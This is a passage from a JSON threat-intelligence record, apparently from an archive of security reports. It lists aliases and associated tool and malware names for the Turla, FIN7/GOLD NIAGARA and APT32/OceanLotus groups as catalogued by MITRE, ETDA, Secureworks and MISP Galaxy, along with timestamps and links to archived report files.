[ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434515, "ts_updated_at": 1775826701, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.pdf", "text": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.txt", "img": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.jpg" } }